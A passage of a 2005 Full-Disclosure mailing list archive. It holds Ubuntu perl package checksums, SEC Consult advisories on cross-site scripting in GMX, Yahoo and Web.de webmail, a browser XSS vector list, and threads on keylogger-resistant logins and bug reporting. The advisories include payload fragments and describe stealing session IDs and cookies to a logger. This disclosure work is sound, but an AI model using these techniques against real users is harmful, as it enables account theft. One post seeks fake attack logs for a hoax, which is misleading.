be2b0d1b086af1fe4de25456d8db0a32 http://security.ubuntu.com/ubuntu/pool/main/p/perl/libperl5.8_5.8.4-6ubuntu1.1_i386.deb Size/MD5: 494206 a23e58dc0ed626af909d7b5d6992665c http://security.ubuntu.com/ubuntu/pool/main/p/perl/perl-base_5.8.4-6ubuntu1.1_i386.deb Size/MD5: 731022 5cbdd58be91bec1b8bda5b9e0ce5041c http://security.ubuntu.com/ubuntu/pool/universe/p/perl/perl-debug_5.8.4-6ubuntu1.1_i386.deb Size/MD5: 3630452 340473c47f02b82e3ab58ebce8a2cb4c http://security.ubuntu.com/ubuntu/pool/main/p/perl/perl-suid_5.8.4-6ubuntu1.1_i386.deb Size/MD5: 30464 5c493e827dcd495f0a74be1cb7d76d26 http://security.ubuntu.com/ubuntu/pool/main/p/perl/perl_5.8.4-6ubuntu1.1_i386.deb Size/MD5: 3230234 6dfd8e1ffc89ab95f380093ae676829a powerpc architecture (Apple Macintosh G3/G4/G5) http://security.ubuntu.com/ubuntu/pool/main/p/perl/libperl-dev_5.8.4-6ubuntu1.1_powerpc.deb Size/MD5: 625218 71310d2d768fe03cf6a9a23a4d43298a http://security.ubuntu.com/ubuntu/pool/main/p/perl/libperl5.8_5.8.4-6ubuntu1.1_powerpc.deb Size/MD5: 1044 45d4349e536701ce7ed8032056da3ba0 http://security.ubuntu.com/ubuntu/pool/main/p/perl/perl-base_5.8.4-6ubuntu1.1_powerpc.deb Size/MD5: 789578 1ff2f2abd2469dc46cb7cbda0d9be51d http://security.ubuntu.com/ubuntu/pool/universe/p/perl/perl-debug_5.8.4-6ubuntu1.1_powerpc.deb Size/MD5: 3588104 2fbb1cb36d1f38af8a165397bbe08695 http://security.ubuntu.com/ubuntu/pool/main/p/perl/perl-suid_5.8.4-6ubuntu1.1_powerpc.deb Size/MD5: 33578 9b2011b06bf9837f88d24cbc4051067c http://security.ubuntu.com/ubuntu/pool/main/p/perl/perl_5.8.4-6ubuntu1.1_powerpc.deb Size/MD5: 3509086 5029a74793ea9a46ddf8053a94193d21 Updated packages for Ubuntu 5.10: Source archives: http://security.ubuntu.com/ubuntu/pool/main/p/perl/perl_5.8.7-5ubuntu1.1.diff.gz Size/MD5: 134597 d5eb14b2a7b72b5fef014284cb989404 http://security.ubuntu.com/ubuntu/pool/main/p/perl/perl_5.8.7-5ubuntu1.1.dsc Size/MD5: 724 cc3cd8ed85ab22c3dc5bcc28e4dfa166 http://security.ubuntu.com/ubuntu/pool/main/p/perl/perl_5.8.7.orig.tar.gz Size/MD5: 12512211 dacefa1fe3c5b6d7bbc334ad94826131 Architecture independent packages: http://security.ubuntu.com/ubuntu/pool/universe/p/perl/libcgi-fast-perl_5.8.7-5ubuntu1.1_all.deb Size/MD5: 39132 1698e69173383d40dbf7265ea9c31c75 http://security.ubuntu.com/ubuntu/pool/main/p/perl/perl-doc_5.8.7-5ubuntu1.1_all.deb Size/MD5: 7206644 da242594035cf2bf1e7f7e73e67c2562 http://security.ubuntu.com/ubuntu/pool/main/p/perl/perl-modules_5.8.7-5ubuntu1.1_all.deb Size/MD5: 2325766 7f69e0426eca9092f4e0da8c12be7cb5 amd64 architecture (Athlon64, Opteron, EM64T Xeon) http://security.ubuntu.com/ubuntu/pool/main/p/perl/libperl-dev_5.8.7-5ubuntu1.1_amd64.deb Size/MD5: 641136 5f3b2d6818b93ce69f45c2225475f994 http://security.ubuntu.com/ubuntu/pool/main/p/perl/libperl5.8_5.8.7-5ubuntu1.1_amd64.deb Size/MD5: 1008 909ca536921167aa03a9bcfe17504ecc http://security.ubuntu.com/ubuntu/pool/main/p/perl/perl-base_5.8.7-5ubuntu1.1_amd64.deb Size/MD5: 819570 323c17484cbcdd2325016faa41954d9d http://security.ubuntu.com/ubuntu/pool/universe/p/perl/perl-debug_5.8.7-5ubuntu1.1_amd64.deb Size/MD5: 2689162 81924c3f4ea92a95efe6ca26a9e93d35 http://security.ubuntu.com/ubuntu/pool/main/p/perl/perl-suid_5.8.7-5ubuntu1.1_amd64.deb Size/MD5: 31392 7b62c900f9d4226baf46536f33aa43cb http://security.ubuntu.com/ubuntu/pool/main/p/perl/perl_5.8.7-5ubuntu1.1_amd64.deb Size/MD5: 3974714 ec727b329279874b06c3a1ff4eaf013d i386 architecture (x86 compatible Intel/AMD) http://security.ubuntu.com/ubuntu/pool/main/p/perl/libperl-dev_5.8.7-5ubuntu1.1_i386.deb Size/MD5: 560106 4a7bfbf041785c53c17549b9fe8b5651 http://security.ubuntu.com/ubuntu/pool/main/p/perl/libperl5.8_5.8.7-5ubuntu1.1_i386.deb Size/MD5: 505946 8b87d461dd40e550869ab377449cd07b http://security.ubuntu.com/ubuntu/pool/main/p/perl/perl-base_5.8.7-5ubuntu1.1_i386.deb Size/MD5: 737400 49b7d3f90c86c53c75dddaf1c7451b01 http://security.ubuntu.com/ubuntu/pool/universe/p/perl/perl-debug_5.8.7-5ubuntu1.1_i386.deb Size/MD5: 2453904 932044f5e5b32e7cbe7ebe7ba1787806 http://security.ubuntu.com/ubuntu/pool/main/p/perl/perl-suid_5.8.7-5ubuntu1.1_i386.deb Size/MD5: 28828 1824f7c1147d4039b5ad8e0880329fc2 http://security.ubuntu.com/ubuntu/pool/main/p/perl/perl_5.8.7-5ubuntu1.1_i386.deb Size/MD5: 3297136 39cdfaba9743158eb0f770e2caec2adc powerpc architecture (Apple Macintosh G3/G4/G5) http://security.ubuntu.com/ubuntu/pool/main/p/perl/libperl-dev_5.8.7-5ubuntu1.1_powerpc.deb Size/MD5: 656086 7fbb2c2885063467fb63ceadf83856e0 http://security.ubuntu.com/ubuntu/pool/main/p/perl/libperl5.8_5.8.7-5ubuntu1.1_powerpc.deb Size/MD5: 1008 c463dda6c6b94f4a279d8180924c1fa3 http://security.ubuntu.com/ubuntu/pool/main/p/perl/perl-base_5.8.7-5ubuntu1.1_powerpc.deb Size/MD5: 814770 ba1a2147b2717afdeb6bc6c603748684 http://security.ubuntu.com/ubuntu/pool/universe/p/perl/perl-debug_5.8.7-5ubuntu1.1_powerpc.deb Size/MD5: 2646280 c7debfc211977a5587eeb353dcf9ac09 http://security.ubuntu.com/ubuntu/pool/main/p/perl/perl-suid_5.8.7-5ubuntu1.1_powerpc.deb Size/MD5: 31994 635f808e87308177acc302816f65a566 http://security.ubuntu.com/ubuntu/pool/main/p/perl/perl_5.8.7-5ubuntu1.1_powerpc.deb Size/MD5: 3657374 cbe8f520cc8e821b288c06af052822f6 -------------- next part -------------- A non-text attachment was scrubbed... Name: not available Type: application/pgp-signature Size: 189 bytes Desc: Digital signature Url : http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20051202/46256817/attachment.bin From iago at valhallalegends.com Fri Dec 2 13:51:46 2005 From: iago at valhallalegends.com (Ron) Date: Fri, 02 Dec 2005 07:51:46 -0600 Subject: [Full-disclosure] Hacking hoax... Message-ID: <43905172.2030105@valhallalegends.com> I'm hosting a bit of a hoax this week (to celebrate December Fool's Day, not to be confused with April Fool's Day, which is real). What I need is some log files that seem to indicate an attack. I already posted some FTP brute-force-looking stuff, but it was pretty weak. Anybody got some cool looking log files I can borrow? Thanks! From mmadison at fnni.com Fri Dec 2 14:19:02 2005 From: mmadison at fnni.com (Madison, Marc) Date: Fri, 2 Dec 2005 08:19:02 -0600 Subject: [Full-disclosure] SOX whistleblower requirements challenged in court? (Was SOX whistleblowers' clause Compliance) Message-ID: "Challenged" may not have been the appropriate word, again IANAL, google sox+whistleblower+court. Or if you trust me then just click on the below link ;) www.nixonpeabody.com/linked_media/publications/ELA_12282004.pdf -----Original Message----- From: full-disclosure-bounces at lists.grok.org.uk [mailto:full-disclosure-bounces at lists.grok.org.uk] On Behalf Of Jesse W. Asher Sent: Friday, December 02, 2005 5:55 AM To: full-disclosure at lists.grok.org.uk Subject: [Full-disclosure] SOX whistleblower requirements challenged in court? (Was SOX whistleblowers' clause Compliance) I was curious about the mention of "the SOX whistleblowers requirements have been challenged in court". Can anyone provide more information on this? What has challenged and why? Thanks!! >>From: Madison, Marc [mailto:mmadison at fnni.com] IANAL, But IMO use an >>Intranet web page that allows employees to submit anonymous html post >>to the web server via html. Now if your security policy is pervasive >>then surely auditing is enabled on all your systems, thus removing any >>anonymity this would have provided. Have you considered, dare I say, >>outsourcing? I only say this since part of the requirement calls for >>the company to provide sufficient anonymity to individuals reporting >>issues. By the way the SOX whistleblowers requirements have already >>been challenged in court so there might be precedence on what is >>sufficient. >> >> _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ From research at sec-consult.com Fri Dec 2 15:21:07 2005 From: research at sec-consult.com (Sec Consult Research) Date: Fri, 02 Dec 2005 16:21:07 +0100 Subject: [Full-disclosure] SEC Consult SA-20051202-1 :: GMX Webmail XSS Message-ID: <43906663.2010809@sec-consult.com> ========================================================== SEC-CONSULT Security Advisory 20051202-0 GMX / MSIE XSS ========================================================== Product: GMX Webmail V ?.? in combination with MSIE (maybe other browsers) Remarks: no other Versions tested but very likely vulnerable Vulnerablities: Multiple XSS/Relogin-trojan Vendor: gmx.net Vendor-Status: first time vendor contacted (2005.12.02) Vendor-Patchs: --- Object: MSIE (unknown version - 5.*+) Exploitable: Local: --- Remote: YES Type: XSS - Cross Site Scripting ============ Introduction ============ GMX-Webmail Vulnerability #1/2005 ===================== Vulnerability Details ===================== 1) XSS / Relogin Trojan ======================= gmx.net s blacklists fail to detect script-tags in combination with SPECIAL/META-Characters. This leavas Webmail users using MSIE vulnerable to typical XSS / Relogin-trojan attacks. Vulnerable TAG/ATTRIBUTTE ========================= P/STYLE (most likely others) Malicious HTML-Mail: =================================================================================================================== P-TAG / STYLE ATTRIBUTE: ---cut here---

Hola Seniores ...

---cut here--- =================================================================================================================== Remark: Since the authentication tokens are stored in a second subdomain it is not possible steal them with a single XSS. It is very likely that a second XSS vulnerability within this domain could be used to achieve this goal. When users want to view HTML messages they have to confirm this by clicking on a single link. We assume that everybody would do so. =============== General remarks =============== We would like to apologize in advance for potential nonconformities and/or known issues. ====================================== Recommended hotfixes for webmail-users ====================================== Do not use MS Internet-Explorer. ================= Recommended fixes ================= Do not use blacklists on tags and attributes. Whitelist special/meta-characters. ============== Vendor-Patches ============== --- ======= Contact ======= SEC-CONSULT Austria / EUROPE research at sec-consult.com From research at sec-consult.com Fri Dec 2 15:23:01 2005 From: research at sec-consult.com (Sec Consult Research) Date: Fri, 02 Dec 2005 16:23:01 +0100 Subject: [Full-disclosure] SEC Consult SA-20050212-1 :: A Word on Webmail Security and Browser related XSS Bugs Message-ID: <439066D5.2020907@sec-consult.com> SEC-CONSULT Security Discussion Paper 20051202-1 ================================================================================ title: A Word on Webmail Security and Browser related XSS Bugs program: Multiple Webmail Solutions found: --- by: SEC Consult Vulnerability Lab / www.sec-consult.com affected vendors: Yahoo, Web.de original adv.: http://www.sec-consult.com/234.html ================================================================================ ----------- 1. PREFACE: ----------- As you all know, it is a tedious task to secure webmail services against Cross Site Scripting attacks if they provide HTML email functionality. Within the last few years a new type of XSS Attacks have emerged. The combination of classic style XSS and incorrect HTML parsing of several Webbrowsers (mostly MSIE) can lead to a dangerous situation for webmail systems as well as other webapplications. Especially the insertion of non printable characters like 0x00,0xff but also many others can be used to trigger such combined vulnerabilities. Many vendors implement blacklist filters or other security measures, while the root of the problem remains untouched. SEC Consult has been in touch with various webmail vendors for quite some time, trying to make this point clear. However, the situation has not changed as the security officers in charge do not show much interest in the matter. The tenor of replies (if any) to our advisories is that this is not a security issue or is impossible to exploit. Eventually, specific Cross Site Scripting vectors will be quietly fixed, though, but it is a matter of minutes to find a new one. In this security information, we will address fixed and unfixed Cross Site Scripting flaws of large scale webmail providers to add some proof for our ongoing allegations. ----------------------------------------- 3. LATEST XSS VECTORS FOR YAHOO s WEBMAIL ----------------------------------------- OUR LATEST YAHOO ADVISORY: ========================================================== SEC-CONSULT Security Advisory 20051125-y8 Yahoo / MSIE XSS ========================================================== Product: Yahoo Webmail in combination with MSIE 6.0(maybe other browsers) Remarks: no other Versions tested but very likely vulnerable Vulnerablities: Multiple XSS/Cookie-Theft/Relogin-trojan Vendor: Yahoo Vendor-Status: first time vendor contacted (2005.09) Vendor-Patchs: patched in production environment Object: MSIE (unknown version - 5.+) Exploitable: Local: --- Remote: YES Type: XSS - Cross Site Scripting - Cookie/Account Theft ============ Introduction ============ Yahoo-Webmail Vulnerability #8/2005 Followup for http://seclists.org/lists/bugtraq/2005/Oct/0263.html ===================== Vulnerability Details ===================== 1) XSS / Cookie-Theft / Relogin Trojan ====================================== Yahoos blacklists fail to detect script-tags in combination with SPECIAL/META-Characters. This leaves Webmail users using MSIE vulnerable to typical XSS / Relogin-trojan attacks. Vulnerable TAG/ATTRIBUTTE ========================= XML/DATASRC Malicious HTML-Mail: =========================================================================================================== XML-TAG / datasrc ATTRIBUTE: ---cut here---

Hola Seniores,


\n]]> ---cut here--- =========================================================================================================== =============== General remarks =============== We would like to apologize in advance for potential nonconformities and/or known issues. ====================================== Recommended hotfixes for webmail-users ====================================== Do not use MS Internet-Explorer. ================= Recommended fixes ================= Do not use blacklists on tags and attributes. Whitelist special/meta-characters. ============== Vendor-Patches ============== vulnerability has been fixed in production environment. .. and in addition some examples taken from our Yahoo webmail XSS Advisories from 2005. ================================================================================================ SCRIPT-TAG: ---cut here---

hello

alert("i have you now")
rrrrrrxxxxx
---cut here--- ================================================================================================ OBJECT-TAG: ---cut here--- ---cut here--- ================================================================================================ ONERROR-Attribute: ---cut here--- uargg

---cut here--- ================================================================================================ ONUNLOAD-Attribute: ---cut here---

somewords

---cut here--- ================================================================================================ ... many more to come :) -------------------------------- 3. EXPLOITING XSS FLAWS / WEB.DE -------------------------------- Web.de is one of Germany's biggest webmail/freemail provider. Running javascript HTML Mails can be done by trivial standard tricks, however, web.de claims to be unexploitable due the security guards in place. Firsty, session validation based on three variables, being the User-ID Cookie, the useragent, and the random session ID which is passed along in every URL. As a second security measure, HTML Mails are loaded into their own frame from a different domain. This request is validated with an encrypted one time token. Obviously, this makes it more difficult to steal the main session ID, because the victim's browser prevents the attacker's javascript code from cross domain scripting. Naturally, this "protection" can be circumvented. In our proof of concept exploit, we first extract the original domain from document.referer.We then use this information to open the main website in an iframe and leverage one of many other Cross Site Scripting flaws on web.de. This gives us access to frame[0], where we can extract the session ID from any link. We then extract the User-ID cookie and useragent by standard means and pass them to our cookie logger, along with the session ID. THE FIRST WEB.DE ADVISORY: REMARK: When we wrote the first advisory for web.de we thought it would be necessary to use a combination - attack (Browser/XSS). After a while we found out that you can achieve the same goals without using special/meta characters. =========================================================== SEC-CONSULT Security Advisory 20051125-w1 Web.de / MSIE XSS =========================================================== Product: Web.de Freemail in combination with MSIE 6.0 (probably other browsers) Remarks: no other versions tested but very likely vulnerable Vulnerablities: Multiple XSS/Cookie-Theft/Relogin-trojan Vendor: Web.de (Part of United Internet) Vendor-Status: first time vendor contacted (2005.08) Vendor-Patchs: unpatched (Vendor does not consider XSS as a vulnerability) Object: MSIE (unknown version - 5.+ / other Browsers maybe affected too) Exploitable: Local: --- Remote: YES Type: XSS - Cross Site Scripting - Relogin Trojan - Cookie/Account Theft ============ Introduction ============ Web.de is one of the largest freemail provider for the german speaking area. Web.de - Webmail/Freemail Vulnerability #1/2005 ===================== Vulnerability Details ===================== 1) XSS / Cookie-Theft / Relogin Trojan ====================================== Web.de s blacklists fail to detect script-tags in combination with SPECIAL/META-Characters.This leaves Freemail users using MSIE (and most likely many other browsers) vulnerable to typical XSS / Relogin-trojan attacks. The people from web.de try to hide their authentication tokens in another subdomain which is of course not a real measure of security but much more "security by obfuscation". Even if this precaution would prevent users from stealing session-ids and cookies it would never be sufficient against relogin-trojan attacks! Vulnerable TAG/ATTRIBUTTE ========================= MANY(most likely every one which can be used to inject java/vbscripts) How to create a malicious HTML-Mail using perl to exploit this vulnerability (this part of the advisory has been modified for this discussion paper): ==============================================================================================================================

Milk is for babies. When you grow up you have to drink beer.


// if you are a security/jscript professional its an easy task to get a readable plaintext version of this :-) // please remove linefeeds for proper functionality ============================================================================================================================== =============== General remarks =============== We would like to apologize in advance for potential nonconformities and/or known issues. ====================================== Recommended hotfixes for webmail-users ====================================== Do not use web.de s freemail. ================= Recommended fixes ================= Do not use blacklists on tags and attributes. Whitelist special/meta-characters. ============== Vendor-Patches ============== Vulnerability has not been fixed in production environment. Remark regarding our disclosure policies: Normally SEC-Consult's disclosure policy forbids making vulnerabilities public before they are fixed. In a couple of telephone calls, with a LETTER and many e-mails the people from web.de could not be convinced that Cross Site Scripting is a security vulnerability. Since it is not very likely that a fix will be made available soon we would like to inform the users of web.de about this serious issue. ---------------------------------------- 4. RECOMMENDED FIXES FOR WEBMAIL VENDORS ---------------------------------------- You must employ whitelist filters. Meaning: Do not rely on filtering "script", "javascript" and specific exploits. Deny HTML tags by default, then allow the basic required tags and validate each of them. SEC Consult and other security professionals will not hesitate to give you free advice on how to implement this correctly. ------------------ 5. GENERAL REMARKS ------------------ We would like to apologize in advance for potential nonconformities and/or known issues. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ SEC Consult Unternehmensberatung GmbH Office Vienna Blindengasse 3 A-1080 Wien Austria Tel.: +43 / 1 / 409 0307 - 570 Fax.: +43 / 1 / 409 0307 - 590 Mail: office at sec-consult dot com www.sec-consult.com EOF SEC Consult Vulnerability Lab / @2005 research at sec-consult dot com From ccarpenter at dswa.net Fri Dec 2 15:23:16 2005 From: ccarpenter at dswa.net (Christopher Carpenter) Date: Fri, 2 Dec 2005 08:23:16 -0700 Subject: [Full-disclosure] Support_388945a0 account in Win XP/2003 Message-ID: <78744869705CEF41A32C103C5C04F2200163A82E@phxexc1.dswa.net> Or more appropriately for the Windows security model, DISABLE the account. That way you're not messing with default permissions, and the account (and its associated SID) are there if you need them in the future. Or not. Chris -----Original Message----- From: full-disclosure-bounces at lists.grok.org.uk [mailto:full-disclosure-bounces at lists.grok.org.uk] On Behalf Of Aditya Deshmukh Sent: Thursday, December 01, 2005 10:09 PM To: 'Raoul Nakhmanson-Kulish' Cc: full-disclosure at lists.grok.org.uk Subject: RE: [Full-disclosure] Support_388945a0 account in Win XP/2003 > > > That is a "help and support account" that you should disable. > > Also set very long random password and forget it. > I prefer simply delete it. Good choice? > > But I heard a rumours that this account can be activated remotely > without user's aware decision and used for Remote Assistance (e.g. > capturing a screen and even controlling input). I would not know about this unless I test it out, but from the top of my mind : you have to start the service for something like this Deleting it might cause problems "help and support" just deny the account all kinds of privs and it would no longer matter. ________________________________________________________________________ Delivered using the Free Personal Edition of Mailtraq (www.mailtraq.com) _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ From research at sec-consult.com Fri Dec 2 15:25:52 2005 From: research at sec-consult.com (Bernhard Mueller) Date: Fri, 02 Dec 2005 16:25:52 +0100 Subject: [Full-disclosure] SEC Consult SA-XXXXXXXXXXX Message-ID: <43906780.6040203@sec-consult.com> I just totally mixed up these numbers. Should be SA-20051202-0 and SA-20051202-1, in the doubtful case that anyone cares. From harry at behrens.com Fri Dec 2 15:43:02 2005 From: harry at behrens.com (Harry Behrens) Date: Fri, 02 Dec 2005 16:43:02 +0100 Subject: [Full-disclosure] 22nd CCC conference in Berlin In-Reply-To: <43906780.6040203@sec-consult.com> References: <43906780.6040203@sec-consult.com> Message-ID: <43906B86.3020103@behrens.com> In case anybody on this list hasn't heard: the 22nd annual Chaos Computer Club gathering is happening in Berlin between X-Mas and the New Year: @ http://events.ccc.de/congress/2005/ Be tracing you there...;-) -h From st4rdust at gmail.com Fri Dec 2 16:15:31 2005 From: st4rdust at gmail.com (hoshikuzu stardust) Date: Sat, 3 Dec 2005 01:15:31 +0900 Subject: [Full-disclosure] Opera/8.51 Firefox/1.5 XSS attacking vector Message-ID: <920140c20512020815m7a7cb260k6f85b3d55489be42@mail.gmail.com> Hello full-disclosure. Sample: Affected Web browsers are `Opera Version 8.51` and `Firefox/1.5`. ( Tested on Windows XP servicepack2. ) Variant: "\d" "\D" "\0d" "\00000d" "\d " "\00000d " "\a" "\9" e.t.c. (Maybe we must checkout \7 via IE on Mac (a.k.a. BELL on Mac. ), I do not have Mac. If your web application does not sanitize output it is very easy to inject malicious scripts. Is it well-known information ? ,sorry. BEST REGARDS. -- hoshikuzu | star_dust From paul at onestepsolutions.net Fri Dec 2 16:57:32 2005 From: paul at onestepsolutions.net (Paul Stephens) Date: Sat, 03 Dec 2005 03:57:32 +1100 Subject: [Full-disclosure] Software Firewalls for Windows In-Reply-To: References: Message-ID: <20051203035732.tdbpgblbfjocswcs@www.onestepsolutions.net> Quoting Aditya Deshmukh : > >> Hi list, I've been a firm advocate of Sygate Pro for some >> time but as Symantec >> has bought and canned it I'm wondering what you guys would >> recommend as a >> replacement. > > Tiny Firewall 2005 works for both 64 and 32 bit machines > And is good - I have been using in since version 2.1.5 > And now its 6.5.xx Thanks heaps for the suggestions & heads-up, guys. I guess I'll be busy for a bit testing the evaluation versions but I should then be better equipped to cater for the various skill levels and requirements of my clients. Regards Paul Stephens (Proprietor - OneStep Solutions) http://www.onestepsolutions.net/ -------------- next part -------------- A non-text attachment was scrubbed... Name: not available Type: application/pgp-keys Size: 1336 bytes Desc: PGP Public Key Url : http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20051203/3626fc49/attachment.bin From kanarip at pczone-clan.nl Fri Dec 2 17:09:36 2005 From: kanarip at pczone-clan.nl (Jeroen van Meeuwen) Date: Fri, 2 Dec 2005 18:09:36 +0100 Subject: [Full-disclosure] Most common keystroke loggers? In-Reply-To: <001101c5f6d5$9fda54c0$6600a8c0@kpllaptop> Message-ID: <200512021725.jB2HPAix028968@pinky.pczone-clan.nl> My guess is you would either need something the _compromised_ system could not obtain/remember, or something that, would it be obtained/remembered by the system, isn't useable twice. Any thoughts on this? Kind regards, Jeroen van Meeuwen -- kanarip From kanarip at pczone-clan.nl Fri Dec 2 17:14:06 2005 From: kanarip at pczone-clan.nl (Jeroen van Meeuwen) Date: Fri, 2 Dec 2005 18:14:06 +0100 Subject: [Full-disclosure] Help with reporting In-Reply-To: <3f3ecb5a0511300822j6cf66518g712de8b36cf8f72b@mail.gmail.com> Message-ID: <200512021729.jB2HTe77029023@pinky.pczone-clan.nl> Or you could just report the bug to the list... Kind regards, Jeroen van Meeuwen -- kanarip > It would probably be the most socially responsible to report the bug > to security at php.net first and allow them to assist in fixing it and > putting out an advisory (they would almost certainly be amenable to > crediting you with finding it, if this is important to you) > > As a quote from http://bugs.php.net/report.php: > > "If you feel this bug concerns a security issue, eg a buffer overflow, > weak encryption, etc, then email security at php.net who will assess the > situation." > > --A > > On 11/30/05, Dr HenDre wrote: > > Hi list, > > > > I've been following this list for quite a while now and finally i can > > contribute something. > > I think (i'm pretty sure) I've found a security bug in php, though I > > not at all familiar with reporting bugs to the vendor and to the list. > > So I'm looking for someone who can lead me the way. > > > > Thanks, From sjohnston at cavionplus.com Fri Dec 2 17:10:28 2005 From: sjohnston at cavionplus.com (Shannon Johnston) Date: Fri, 02 Dec 2005 10:10:28 -0700 Subject: [Full-disclosure] Most common keystroke loggers? Message-ID: <1133543428.12950.108.camel@localhost> This is fantastic! I like all the feed back that has been coming through. I think that it would be helpful to explain a bit more. The original question about keystroke loggers was an effort to find some loggers that were in use (with screen capture capability) so they could be used in our testing. The actual problem stems from our efforts of trying to secure an application keeping in mind that a user's system may be compromised, and/or the user has been socially engineered into giving out important credential information. We've been playing with 2-factor authentication, randomized graphical "keyboards", S/Key, one time passwords (sent via email/SMS), even getting to the point where the system will call a user on the phone and ask for a verification word when authentication is attempted. I know that education of the end user is the best defense, but there will always be people who just don't get it. With that logic I almost have to consider the user an untrusted source. The goal of the project is to see if we can design a system that prevents an uneducated user from shooting themselves in the in the foot. Shannon On Fri, 2005-12-02 at 12:01 +1300, Nick FitzGerald wrote: > deepquest wrote: > > > To me the only thing that can defeat keystroke is what a software or > > trojan can not do: See (OCR is just a partial application of guess > > but not applicable in that case) > > Then you are so far inside the box you cannot see the walls... > > The OP said "keystroke logger" BUT he also said "compromised". If the > machine is compromised you cannot limit yourself to "keylogging" as a > compromised machine may be running _anything_ (including something not > yet written, as we are talking about a hypothetical future situation, > so the OP limiting the original question to "the most common keylogger" > is further evidence that the OP does not understand the actual problem > set he has been posed). > > > Imagine a web page with a virtual keyboard page (clickable). In order > > to prevent the localisation on the keys mapping based on position of > > the mouse, display the keyboard on random location of the screen. ... > > Trivially, and already long ago, overcome by screen-shot keyloggers. > > > ... Add > > a random password and challenge authentication process. > > Why? > > This adds nothing but annoyance to the user, thus reducing usability. > If you're going to move to OTP, why _also_ move to an onscreen > keyboard? It's almost like you believe that taking two unrelated > approaches that indivdually make no improvement whatsoever will > suddenly make some real improvement when combined. A hint -- zero plus > zero equals ?????? > > As already explained ad nauseum to the other na?ve "use OTP", if you do > not do something "out of band" _relative to any and all possible "bad > code" that could be running on a compromised machine_, you have lost. > To achieve that requires a second, "secure" piece of _hardware_ that > simply uses the network connection through the compromised machine to > communicate in a crptographically secure way with the server. The OP > made no mention of designing hardware > > > my 2 cents, > > If that's really what the above "advice" is worth, inflation must be > _really bad_ where you are! > > > Regards, > > Nick FitzGerald > > _______________________________________________ > Full-Disclosure - We believe in it. > Charter: http://lists.grok.org.uk/full-disclosure-charter.html > Hosted and sponsored by Secunia - http://secunia.com/ From mattmurphy at kc.rr.com Fri Dec 2 17:24:21 2005 From: mattmurphy at kc.rr.com (Matthew Murphy) Date: Fri, 02 Dec 2005 11:24:21 -0600 Subject: [Full-disclosure] Help with reporting In-Reply-To: <200512021729.jB2HTe77029023@pinky.pczone-clan.nl> References: <200512021729.jB2HTe77029023@pinky.pczone-clan.nl> Message-ID: <43908345.8050907@kc.rr.com> -----BEGIN PGP SIGNED MESSAGE----- Hash: RIPEMD160 Jeroen van Meeuwen wrote: > Or you could just report the bug to the list... I would *NOT* encourage reporting the vulnerability straight to the list. The advice I'd offer the OP is to report it individually, or use a coordinator or one of the services like VulnHelp that offer researchers assistance in vulnerability reporting. Truth-be-told, I'd encourage the use of coordinators if you have any hope for a resolution of a PHP security issue. I find that the project seldom takes vulnerability reports seriously, preferring instead to ridicule researchers who contribute bug reports. In addition to the lack of professionalism commonly found amongst team members, the response process is poorly structured. The project has no advisory mechanism in place to deal specifically with security issues. The team often does not credit reporters of security vulnerabilities or other bugs in its software, if they ever get fixed. The supposed "process" is so ad hoc that even calling it a process is probably undeserved praise. Put simply: PHP's security processes lag far behind even its commercial competitors -- PHP is the Oracle of open-source and worse. Dealing with them makes Microsoft and kin look like a cakewalk. - -- "Social Darwinism: Try to make something idiot-proof, nature will provide you with a better idiot." -- Michael Holstein -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.2 (MingW32) Comment: Using GnuPG with Thunderbird - http://enigmail.mozdev.org iD8DBQFDkINFfp4vUrVETTgRA1qMAKDLDNGB18dQ2TKCWhz4scL0O4FPxwCgzhpS r7RRj23hMLkXOcogHm9p958= =iKsq -----END PGP SIGNATURE----- -------------- next part -------------- A non-text attachment was scrubbed... Name: smime.p7s Type: application/x-pkcs7-signature Size: 3436 bytes Desc: S/MIME Cryptographic Signature Url : http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20051202/62c5aa01/attachment.bin From frank at knobbe.us Fri Dec 2 17:35:16 2005 From: frank at knobbe.us (Frank Knobbe) Date: Fri, 02 Dec 2005 11:35:16 -0600 Subject: [Full-disclosure] Most common keystroke loggers? In-Reply-To: <228735040512011518o7b5fa823h77c5c14135927a9f@mail.gmail.com> References: <228735040512011518o7b5fa823h77c5c14135927a9f@mail.gmail.com> Message-ID: <1133544916.49544.32.camel@localhost> On Fri, 2005-12-02 at 10:18 +1100, mz4ph0d at gmail.com wrote: > That would at least stop two of those problems, those being > basic keylogging, and screenshots of the hotspot on click. Why wait for a click? The attacker can just record all screen activity in an AVI file and upload that. No need to wait for clicks. Other options would be audible passwords, but the attacker could also records all sound. There might be optical effects tricks that could be employed that play on things like the latency of a retina or whatnot. Flash a series of random numbers on the screen while giving one number a bit longer time. The pattern might appear to the human eye like that number, while it *may* defeat screen recordings. (frequency of display changes and attacker recording screen data would be the same for the attacker to interpret the visual effect exactly like the user). At the end of the day, one-time-passwords for login *and* transactions are probably the only real solution to prevent replay and mitm attacks (the latter using OTP hashed transactions). Cheers, Frank -- It is said that the Internet is a public utility. As such, it is best compared to a sewer. A big, fat pipe with a bunch of crap sloshing against your ports. -------------- next part -------------- A non-text attachment was scrubbed... Name: not available Type: application/pgp-signature Size: 187 bytes Desc: This is a digitally signed message part Url : http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20051202/77bc4bbb/attachment.bin From mail at hackingspirits.com Fri Dec 2 17:59:33 2005 From: mail at hackingspirits.com (Debasis Mohanty) Date: Fri, 2 Dec 2005 23:29:33 +0530 Subject: [Full-disclosure] Most common keystroke loggers? In-Reply-To: <1133544916.49544.32.camel@localhost> Message-ID: <20051202180113.99CC9ABB@lists.grok.org.uk> -----Original Message----- From: On Behalf Of Frank Knobbe Sent: Friday, December 02, 2005 11:05 PM To: mz4ph0d at gmail.com Cc: full-disclosure at lists.grok.org.uk Subject: re: [Full-disclosure] Most common keystroke loggers? >> Why wait for a click? The attacker can just record all screen activity in an >> AVI file and upload that. No need to wait for clicks. Average time taken by a user for entering Bank PINs using onscreen keyboards is 1 - 1.5 mins. Size of AVI file generated for 1 - 1.5 min of recording > 1 MB Assuming 10 such recording per day, size > 10 mb Imagine more such infected m/cs sending the logs back to the attacker everyday. Not really follwed by any virus writers. - D From rodrigob at suespammers.org Fri Dec 2 